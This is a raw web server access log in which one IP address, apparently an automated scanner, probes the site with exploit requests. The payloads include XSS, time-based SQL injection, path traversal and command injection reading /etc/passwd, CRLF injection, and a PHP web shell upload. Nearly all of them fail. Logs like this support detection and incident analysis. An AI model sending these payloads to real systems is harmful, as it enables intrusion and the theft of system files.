205.185.122.202 - - [19/Oct/2025:17:58:14 +0530] "GET /picturesPreview?urls=aHR0cDovLzEyNy4wLjAuMS8xLnR4dCI%2BPHN2Zy9vbmxvYWQ9YWxlcnQoZG9jdW1lbnQuZG9tYWluKT4%3D HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:17:58:14 +0530] "GET /picturesPreview?urls=aHR0cDovLzEyNy4wLjAuMS8xLnR4dCI%2BPHN2Zy9vbmxvYWQ9YWxlcnQoZG9jdW1lbnQuZG9tYWluKT4%3D HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:17:58:21 +0530] "POST /xmlrpc HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:17:58:21 +0530] "POST /xmlrpc HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:17:59:08 +0530] "POST /webapi/auth HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:17:59:08 +0530] "POST /webapi/auth HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:17:59:11 +0530] "GET /wnm/login/login.json HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:17:59:11 +0530] "GET /wnm/login/login.json HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:17:59:20 +0530] "GET /404%0dnew-header:value%0da: HTTP/1.1" 404 1048
205.185.122.202 - - [19/Oct/2025:17:59:20 +0530] "GET /404%0dnew-header:value%0da: HTTP/1.1" 404 1048
204.76.203.15 - - [19/Oct/2025:17:59:30 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:17:59:49 +0530] "POST /mod/lti/auth.php HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:17:59:49 +0530] "POST /mod/lti/auth.php HTTP/1.1" 404 1026
204.76.203.15 - - [19/Oct/2025:17:59:54 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:18:00:13 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:18:00:13 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:18:00:55 +0530] "POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1" 404 1076
205.185.122.202 - - [19/Oct/2025:18:00:55 +0530] "POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1" 404 1076
205.185.122.202 - - [19/Oct/2025:18:00:58 +0530] "POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1" 404 1076
205.185.122.202 - - [19/Oct/2025:18:00:58 +0530] "POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1" 404 1076
205.185.122.202 - - [19/Oct/2025:18:00:59 +0530] "POST /service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1 HTTP/1.1" 404 1064
205.185.122.202 - - [19/Oct/2025:18:00:59 +0530] "GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp HTTP/1.1" 404 1058
205.185.122.202 - - [19/Oct/2025:18:00:59 +0530] "GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp HTTP/1.1" 404 1058
205.185.122.202 - - [19/Oct/2025:18:00:59 +0530] "POST /service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd HTTP/1.1" 404 1064
205.185.122.202 - - [19/Oct/2025:18:00:59 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:18:00:59 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:18:00:59 +0530] "GET /cgi-bin/popen.cgi?command=type%20C://Windows/win.ini&v=0.1303033443137912 HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:18:00:59 +0530] "GET /cgi-bin/popen.cgi?command=cat%20/etc/passwd&v=0.1303033443137912 HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:18:01:00 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:18:01:00 +0530] "GET /cgi-bin/popen.cgi?command=cat%20/etc/passwd&v=0.1303033443137912 HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:18:01:00 +0530] "POST /service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd HTTP/1.1" 404 1064
205.185.122.202 - - [19/Oct/2025:18:01:00 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:18:01:00 +0530] "GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp HTTP/1.1" 404 1058
205.185.122.202 - - [19/Oct/2025:18:01:00 +0530] "POST /service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1 HTTP/1.1" 404 1064
205.185.122.202 - - [19/Oct/2025:18:01:00 +0530] "GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp HTTP/1.1" 404 1058
205.185.122.202 - - [19/Oct/2025:18:01:00 +0530] "GET /cgi-bin/popen.cgi?command=type%20C://Windows/win.ini&v=0.1303033443137912 HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:18:01:02 +0530] "POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1" 404 1076
205.185.122.202 - - [19/Oct/2025:18:01:02 +0530] "POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1" 404 1076
205.185.122.202 - - [19/Oct/2025:18:01:03 +0530] "GET /login.zul HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:18:01:03 +0530] "GET /login.zul HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:18:01:06 +0530] "GET /rest/api/latest/repos HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:18:01:06 +0530] "GET /rest/api/latest/repos HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:18:01:06 +0530] "POST /fw.login.php HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:18:01:06 +0530] "POST /fw.login.php HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:18:02:27 +0530] "POST /api/v2/open/rowsInfo HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:18:02:27 +0530] "POST /api/v2/open/rowsInfo HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:18:02:30 +0530] "GET /wp-content/plugins/jeg-elementor-kit/readme.txt HTTP/1.1" 404 1088
205.185.122.202 - - [19/Oct/2025:18:02:31 +0530] "GET /wp-content/plugins/jeg-elementor-kit/readme.txt HTTP/1.1" 404 1088
205.185.122.202 - - [19/Oct/2025:18:02:31 +0530] "GET //%5coast.me HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:18:02:31 +0530] "GET //%5coast.me HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:18:03:08 +0530] "POST /js/jquery_file_upload/server/php/ HTTP/1.1" 404 1060
205.185.122.202 - - [19/Oct/2025:18:03:09 +0530] "POST /js/jquery_file_upload/server/php/ HTTP/1.1" 404 1060
205.185.122.202 - - [19/Oct/2025:18:03:20 +0530] "GET /wp-content/plugins/crm-perks-forms/readme.txt HTTP/1.1" 404 1084
205.185.122.202 - - [19/Oct/2025:18:03:21 +0530] "GET /wp-content/plugins/crm-perks-forms/readme.txt HTTP/1.1" 404 1084
205.185.122.202 - - [19/Oct/2025:18:03:23 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:18:03:24 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:18:03:34 +0530] "POST /hms/user-login.php HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:18:03:34 +0530] "POST /hms/user-login.php HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:18:03:42 +0530] "GET /api/subscriber HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:18:03:42 +0530] "GET /api/subscriber HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:18:03:46 +0530] "POST /cgi-bin/xmlstatus.cgi HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:18:03:46 +0530] "POST /cgi-bin/xmlstatus.cgi HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:18:03:54 +0530] "GET /navpage.do HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:18:03:54 +0530] "GET /navpage.do HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:18:04:59 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:18:04:59 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:18:05:10 +0530] "POST /configWizard/keyUpload.jsp HTTP/1.1" 404 1046
205.185.122.202 - - [19/Oct/2025:18:05:10 +0530] "POST /configWizard/keyUpload.jsp HTTP/1.1" 404 1046
205.185.122.202 - - [19/Oct/2025:18:05:18 +0530] "POST /plugins/servlet/groupexportforjira/admin/json HTTP/1.1" 404 1084
205.185.122.202 - - [19/Oct/2025:18:05:19 +0530] "POST /plugins/servlet/groupexportforjira/admin/json HTTP/1.1" 404 1084
205.185.122.202 - - [19/Oct/2025:18:05:34 +0530] "POST /ajax/openvpn/del_ovpncfg.php HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:18:05:34 +0530] "POST /ajax/openvpn/del_ovpncfg.php HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:18:05:39 +0530] "POST /controller/ping.php HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:18:05:39 +0530] "POST /controller/ping.php HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:18:06:00 +0530] "POST /task/loginValidation.php HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:18:06:00 +0530] "POST /task/loginValidation.php HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:18:06:26 +0530] "GET /kfm/index.php/%27%3Cscript%3Ealert%28document.domain%29;%3C/script%3E HTTP/1.1" 404 1132
205.185.122.202 - - [19/Oct/2025:18:06:26 +0530] "GET /kfm/index.php/%27%3Cscript%3Ealert%28document.domain%29;%3C/script%3E HTTP/1.1" 404 1132
205.185.122.202 - - [19/Oct/2025:18:06:28 +0530] "GET /login/ HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:18:06:28 +0530] "GET /login/ HTTP/1.1" 404 1006
178.175.142.134 - - [19/Oct/2025:18:06:30 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:18:06:37 +0530] "GET /index.php/user/ HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:18:06:38 +0530] "GET /index.php/user/ HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:18:06:40 +0530] "POST /wp-admin/admin-ajax.php?action=joomsport_md_load HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:18:06:40 +0530] "POST /wp-admin/admin-ajax.php?action=joomsport_md_load HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:18:07:10 +0530] "GET /wp-admin/admin-ajax.php?action=mcwp_table&mcwp_id=1&order[0][column]=0&columns[0][name]=name+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))aaaa)--+- HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:18:07:11 +0530] "GET /wp-admin/admin-ajax.php?action=mcwp_table&mcwp_id=1&order[0][column]=0&columns[0][name]=name+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))aaaa)--+- HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:18:07:15 +0530] "GET /wp-content/plugins/cryptocurrency-widgets-pack/readme.txt HTTP/1.1" 404 1108
205.185.122.202 - - [19/Oct/2025:18:07:15 +0530] "GET /wp-content/plugins/cryptocurrency-widgets-pack/readme.txt HTTP/1.1" 404 1108
205.185.122.202 - - [19/Oct/2025:18:07:23 +0530] "GET /pfblockerng/www/index.php HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:18:07:24 +0530] "GET /pfblockerng/www/index.php HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:18:07:44 +0530] "GET /goform/downloadSyslog/syslog.log HTTP/1.1" 404 1058
205.185.122.202 - - [19/Oct/2025:18:07:45 +0530] "GET /goform/downloadSyslog/syslog.log HTTP/1.1" 404 1058
205.185.122.202 - - [19/Oct/2025:18:07:49 +0530] "GET /api/v2/cmdb/system/admin HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:18:07:50 +0530] "GET /api/v2/cmdb/system/admin HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:18:07:52 +0530] "PUT /api/v2/cmdb/system/admin/admin HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:18:07:53 +0530] "PUT /api/v2/cmdb/system/admin/admin HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:18:07:58 +0530] "POST /network_test.php HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:18:07:58 +0530] "POST /network_test.php HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:18:08:02 +0530] "POST /wp-admin/admin-ajax.php?action=iws_gff_fetch_states HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:18:08:02 +0530] "POST /wp-admin/admin-ajax.php?action=iws_gff_fetch_states HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:18:08:23 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:18:08:23 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:18:08:26 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:18:08:27 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:18:08:32 +0530] "GET /?q=user/login HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:18:08:32 +0530] "GET /?q=user/login HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:18:08:34 +0530] "GET /?q=user/login HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:18:08:34 +0530] "GET /?q=user/login HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:18:08:35 +0530] "GET /?q=user/login HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:18:08:35 +0530] "GET /?q=user/login HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:18:09:10 +0530] "GET /index.asp HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:18:09:11 +0530] "GET /index.asp HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:18:11:41 +0530] "GET /wp-admin/admin-ajax.php?action=loginas_return_admin HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:18:11:41 +0530] "GET /wp-admin/admin-ajax.php?action=loginas_return_admin HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:18:11:44 +0530] "GET /wp-admin/users.php HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:18:11:45 +0530] "GET /wp-admin/users.php HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:18:11:59 +0530] "GET /index.php?module=users/login HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:18:11:59 +0530] "GET /index.php?module=users/login HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:18:12:02 +0530] "GET /index.php?module=users/login HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:18:12:02 +0530] "GET /index.php?module=users/login HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:18:12:03 +0530] "GET /index.php?module=users/login HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:18:12:04 +0530] "GET /index.php?module=users/login HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:18:12:09 +0530] "GET /index.php?module=users/login HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:18:12:09 +0530] "GET /index.php?module=users/login HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:18:12:17 +0530] "GET /index.php?module=users/login HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:18:12:17 +0530] "GET /index.php?module=users/login HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:18:12:23 +0530] "GET /index.php?module=users/login HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:18:12:23 +0530] "GET /index.php?module=users/login HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:18:12:25 +0530] "GET /index.php?module=users/login HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:18:12:25 +0530] "GET /index.php?module=users/login HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:18:12:50 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:18:12:50 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:18:13:03 +0530] "POST /wp-admin/admin-ajax.php?action=cfom_upload_file&name=34HFSDuWN6SDb8g8Dd0l3g4E1z6.pHp HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:18:13:03 +0530] "POST /wp-admin/admin-ajax.php?action=cfom_upload_file&name=34HFSDuWN6SDb8g8Dd0l3g4E1z6.pHp HTTP/1.1" 404 1040
195.96.129.4 - - [19/Oct/2025:18:13:05 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:18:13:07 +0530] "GET /wp-content/uploads/cfom_files/34hfsduwn6sdb8g8dd0l3g4e1z6.php HTTP/1.1" 404 1116
205.185.122.202 - - [19/Oct/2025:18:13:07 +0530] "GET /wp-content/uploads/cfom_files/34hfsduwn6sdb8g8dd0l3g4e1z6.php HTTP/1.1" 404 1116
205.185.122.202 - - [19/Oct/2025:18:13:31 +0530] "POST /wp-admin/admin-ajax.php?action=get_tag_fonts HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:18:13:31 +0530] "POST /wp-admin/admin-ajax.php?action=get_tag_fonts HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:18:14:13 +0530] "GET /cgi-bin/ExportLogs.sh HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:18:14:13 +0530] "GET /cgi-bin/ExportLogs.sh HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:18:14:30 +0530] "GET /index.php?module=users/login HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:18:14:30 +0530] "GET /index.php?module=users/login HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:18:14:31 +0530] "GET /index.php?module=users/login HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:18:14:33 +0530] "GET /index.php?module=users/login HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:18:14:33 +0530] "GET /index.php?module=users/login HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:18:14:33 +0530] "GET /index.php?module=users/login HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:18:14:36 +0530] "GET /index.php?module=users/login HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:18:14:36 +0530] "GET /index.php?module=users/login HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:18:14:49 +0530] "GET /index.php?module=users/login HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:18:14:49 +0530] "GET /index.php?module=users/login HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:18:14:51 +0530] "GET /index.php?module=users/login HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:18:14:51 +0530] "GET /index.php?module=users/login HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:18:14:59 +0530] "GET /index.php?module=users/login HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:18:14:59 +0530] "GET /index.php?module=users/login HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:18:15:38 +0530] "GET /admin/login/index.php HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:18:15:38 +0530] "GET /admin/login/index.php HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:18:15:43 +0530] "GET /admin/login/index.php HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:18:15:43 +0530] "GET /admin/login/index.php HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:18:16:56 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:18:16:56 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:18:16:56 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:18:16:57 +0530] "GET / HTTP/1.1" 200 11250
195.96.129.4 - - [19/Oct/2025:18:17:43 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:18:18:30 +0530] "POST /wp-json/lp/v1/courses/archive-course HTTP/1.1" 404 1066
205.185.122.202 - - [19/Oct/2025:18:18:30 +0530] "POST /wp-json/lp/v1/courses/archive-course HTTP/1.1" 404 1066
213.209.143.66 - - [19/Oct/2025:18:19:12 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:18:19:33 +0530] "GET /admin/login/index.php HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:18:19:33 +0530] "GET /admin/login/index.php HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:18:20:28 +0530] "POST /classes/Login.php?f=login HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:18:20:29 +0530] "POST /classes/Login.php?f=login HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:18:20:32 +0530] "GET /admin/ HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:18:20:33 +0530] "GET /admin/ HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:18:20:46 +0530] "GET /solr/solrdefault/debug/dump?param=ContentStreams&stream.url=file://c:/windows/win.ini HTTP/1.1" 404 1048
205.185.122.202 - - [19/Oct/2025:18:20:46 +0530] "GET /solr/solrdefault/debug/dump?param=ContentStreams&stream.url=file://c:/windows/win.ini HTTP/1.1" 404 1048
205.185.122.202 - - [19/Oct/2025:18:20:46 +0530] "GET /solr/solrdefault/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd HTTP/1.1" 404 1048
205.185.122.202 - - [19/Oct/2025:18:20:46 +0530] "GET /solr/solrdefault/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd HTTP/1.1" 404 1048
205.185.122.202 - - [19/Oct/2025:18:20:46 +0530] "GET /wp-json/lp/v1/courses/archive-course?template_path=..%2F..%2F..%2Fetc%2Fpasswd&return_type=html HTTP/1.1" 404 1066
205.185.122.202 - - [19/Oct/2025:18:20:46 +0530] "GET /wp-json/lp/v1/courses/archive-course?template_path=..%2F..%2F..%2Fetc%2Fpasswd&return_type=html HTTP/1.1" 404 1066
205.185.122.202 - - [19/Oct/2025:18:20:47 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:18:20:47 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:18:20:48 +0530] "POST /SamlResponseServlet HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:18:20:48 +0530] "POST /SamlResponseServlet HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:18:20:51 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:18:20:51 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:18:20:56 +0530] "POST /aspera/faspex/package_relay/relay_package HTTP/1.1" 404 1076
205.185.122.202 - - [19/Oct/2025:18:20:56 +0530] "POST /aspera/faspex/package_relay/relay_package HTTP/1.1" 404 1076
205.185.122.202 - - [19/Oct/2025:18:21:00 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:18:21:00 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:18:21:08 +0530] "GET /index.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:18:21:08 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:18:21:08 +0530] "GET /index.php HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:18:21:08 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:18:21:43 +0530] "GET /libs/libs/bower/bower_components/yui2/sandbox/treeview/readd.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 1122
205.185.122.202 - - [19/Oct/2025:18:21:43 +0530] "GET /libs/bower/bower_components/yui2/sandbox/treeview/renderhidden.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 1126
205.185.122.202 - - [19/Oct/2025:18:21:43 +0530] "GET /libs/bower/bower_components/yui2/sandbox/treeview/removeall.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 1120
205.185.122.202 - - [19/Oct/2025:18:21:43 +0530] "GET /libs/bower/bower_components/yui2/sandbox/treeview/overflow.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 1118
205.185.122.202 - - [19/Oct/2025:18:21:43 +0530] "GET /libs/bower/bower_components/yui2/sandbox/treeview/removechildren.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 1130
205.185.122.202 - - [19/Oct/2025:18:21:43 +0530] "GET /libs/bower/bower_components/yui2/sandbox/treeview/newnode2.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 1118
205.185.122.202 - - [19/Oct/2025:18:21:43 +0530] "GET /libs/bower/bower_components/yui2/sandbox/treeview/newnode.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 1116
205.185.122.202 - - [19/Oct/2025:18:21:43 +0530] "GET /libs/libs/bower/bower_components/yui2/sandbox/treeview/readd.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 1122
205.185.122.202 - - [19/Oct/2025:18:21:43 +0530] "GET /libs/bower/bower_components/yui2/sandbox/treeview/up.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 1106
205.185.122.202 - - [19/Oct/2025:18:21:44 +0530] "GET /libs/bower/bower_components/yui2/sandbox/treeview/removechildren.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 1130
205.185.122.202 - - [19/Oct/2025:18:21:44 +0530] "GET /libs/bower/bower_components/yui2/sandbox/treeview/removeall.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 1120
205.185.122.202 - - [19/Oct/2025:18:21:44 +0530] "GET /libs/bower/bower_components/yui2/sandbox/treeview/up.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 1106
205.185.122.202 - - [19/Oct/2025:18:21:44 +0530] "GET /libs/bower/bower_components/yui2/sandbox/treeview/sam.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 1108
205.185.122.202 - - [19/Oct/2025:18:21:44 +0530] "GET /libs/bower/bower_components/yui2/sandbox/treeview/renderhidden.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 1126
205.185.122.202 - - [19/Oct/2025:18:21:44 +0530] "GET /libs/bower/bower_components/yui2/sandbox/treeview/sam.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 1108
205.185.122.202 - - [19/Oct/2025:18:21:44 +0530] "GET /libs/bower/bower_components/yui2/sandbox/treeview/overflow.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 1118
205.185.122.202 - - [19/Oct/2025:18:21:44 +0530] "GET /libs/bower/bower_components/yui2/sandbox/treeview/newnode2.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 1118
205.185.122.202 - - [19/Oct/2025:18:21:44 +0530] "GET /libs/bower/bower_components/yui2/sandbox/treeview/newnode.php?mode=1%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 404 1116
205.185.122.202 - - [19/Oct/2025:18:22:33 +0530] "POST / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:18:22:34 +0530] "POST / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:18:22:59 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:18:22:59 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:18:23:18 +0530] "GET /flash/addcrypted2 HTTP/1.1" 404 1028
